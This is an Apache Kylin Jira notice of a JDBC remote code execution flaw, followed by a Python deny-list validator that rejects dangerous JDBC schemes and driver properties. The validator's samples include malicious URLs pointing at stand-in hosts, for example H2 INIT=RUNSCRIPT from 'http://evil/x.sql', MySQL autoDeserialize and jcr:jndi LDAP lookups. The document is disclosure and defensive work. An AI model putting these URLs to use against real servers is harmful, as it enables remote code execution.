Yinghao Lin created KYLIN-5994:
----------------------------------

             Summary: JDBC remote code execution vulnerability
                 Key: KYLIN-5994
                 URL: https://issues.apache.org/jira/browse/KYLIN-5994
             Project: Kylin
          Issue Type: Bug
          Components: RDBMS Source
    Affects Versions: 5.0.0
            Reporter: Yinghao Lin
             Fix For: 5.0.1
From Pho3n1x: There is a vulnerability when adding a JDBC data source with an unchecked JDBC URL, which may cause the Kylin server to connect to a malicious remote server and get an unexpected result with a code execution script invoked.

DBs and their vulnerable URL parameters are:

*derby*
- startMaster
- slaveHost

*mysql*
- autoDeserialize
- queryInterceptors
- statementInterceptors
- detectCustomCollations

*h2*
- INIT=RUNSCRIPT

*ibm db2*
- clientRerouteServerListJNDIName

*sqlite*
- resource:xxx

*bad JDBC scheme*
- jdbc:jcr:jndi
- jdbc:mysql:fabric

--
This message was sent by Atlassian Jira
(v8.20.10#820010)
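An added illustration of the input check the report calls for: a server that accepts a user-supplied JDBC URL should reject the schemes and driver properties listed above before the URL ever reaches the driver. This is example code written for this page, not Kylin's fix and not Pho3n1x's code, and it is in Python rather than Kylin's Java so it can be run stand-alone. The allow-list of sub-protocols, the function names and the sample URLs are assumptions; the forbidden schemes and properties are the ones in the report.

```python
"""Deny-list check for a user-supplied JDBC data-source URL.

Added illustration (not Kylin's own code): rejects the JDBC schemes and
driver properties named in KYLIN-5994 before the URL reaches DriverManager.
The allow-list of sub-protocols below is an assumption made for the example.
"""
import re
from typing import Optional
from urllib.parse import unquote

# Driver properties that let the URL, or the server it points at, run code
# or read files inside the JDBC client. Stored lower-case; comparison is
# case-insensitive on purpose so a re-cased key cannot slip past the check.
DANGEROUS_PROPERTIES = {
    "derby": {"startmaster", "slavehost"},
    "mysql": {"autodeserialize", "queryinterceptors",
              "statementinterceptors", "detectcustomcollations"},
    "h2": {"init"},                               # INIT=RUNSCRIPT FROM '...'
    "db2": {"clientrerouteserverlistjndiname"},   # JNDI lookup -> LDAP
}

# Sub-protocol pairs that are never acceptable for a data source.
DANGEROUS_SCHEMES = {"jcr:jndi", "mysql:fabric"}

# Sub-protocols the server is willing to connect to at all (assumed list).
ALLOWED_SCHEMES = {"mysql", "postgresql", "h2", "derby", "db2", "sqlite"}

# key=value pairs introduced by '?', '&', ';' or ':' (MySQL/PostgreSQL use
# '?k=v&k=v', H2/Derby use ';k=v', DB2 uses ':k=v;'). Keys may not contain
# '/', so the host:port part of '//host:3306/db' never matches.
_PROPERTY_RE = re.compile(r"(?:^|[?&;:])([^=?&;:/]+)=([^&;]*)")


def driver_properties(rest: str) -> dict:
    """Driver properties found after the sub-protocol. Keys are percent-
    decoded and lower-cased so 'auto%44eserialize' is still recognised."""
    return {unquote(k).strip().lower(): unquote(v)
            for k, v in _PROPERTY_RE.findall(rest)}


def check_jdbc_url(url: str) -> Optional[str]:
    """Return None if the URL passes, else a short reason it was rejected."""
    m = re.match(r"\s*jdbc:([a-z0-9]+):(.*)", url, re.I | re.S)
    if not m:
        return "not-jdbc"
    scheme, rest = m.group(1).lower(), m.group(2)
    # Second path segment, e.g. 'fabric' in jdbc:mysql:fabric://... or
    # 'jndi' in jdbc:jcr:jndi:...; checked before the allow-list so the
    # reason is specific.
    sub = re.match(r"([a-z0-9]+):", rest, re.I)
    if sub and f"{scheme}:{sub.group(1).lower()}" in DANGEROUS_SCHEMES:
        return "forbidden-scheme"
    if scheme not in ALLOWED_SCHEMES:
        return "unknown-scheme"
    # sqlite-jdbc's ':resource:' locator loads the database from a URL.
    if scheme == "sqlite" and rest.lstrip(":").lower().startswith("resource:"):
        return "resource-locator"
    bad = DANGEROUS_PROPERTIES.get(scheme, set()) & set(driver_properties(rest))
    if bad:
        return "forbidden-property:" + ",".join(sorted(bad))
    return None


if __name__ == "__main__":
    # Constructed sample URLs, one per entry in the report plus a benign one.
    for sample in [
        "jdbc:mysql://db.internal:3306/kylin?useSSL=true&serverTimezone=UTC",
        "jdbc:mysql://evil:3306/db?autoDeserialize=true&queryInterceptors=x",
        "jdbc:mysql://evil/db?auto%44eserialize=true",
        "jdbc:h2:mem:test;INIT=RUNSCRIPT FROM 'http://evil/x.sql'",
        "jdbc:derby:sales;startMaster=true;slaveHost=attacker.example",
        "jdbc:db2://host:50000/db:clientRerouteServerListJNDIName=ldap://evil/x;",
        "jdbc:sqlite::resource:http://evil/x.db",
        "jdbc:jcr:jndi:ldap://evil:389/x",
        "jdbc:mysql:fabric://host:32274/db",
    ]:
        print(f"{check_jdbc_url(sample) or 'ok':45s} {sample}")
```

The check parses the decoded form of every key before comparing, because percent-encoding a single letter of `autoDeserialize` would otherwise hide it from a naive substring match. A deny-list like this only covers properties that are already known to be dangerous; a stricter server would allow-list the few driver properties it actually needs and reject everything else, and in either case the check has to run before `DriverManager.getConnection`, since the driver starts talking to the remote host as soon as it is called.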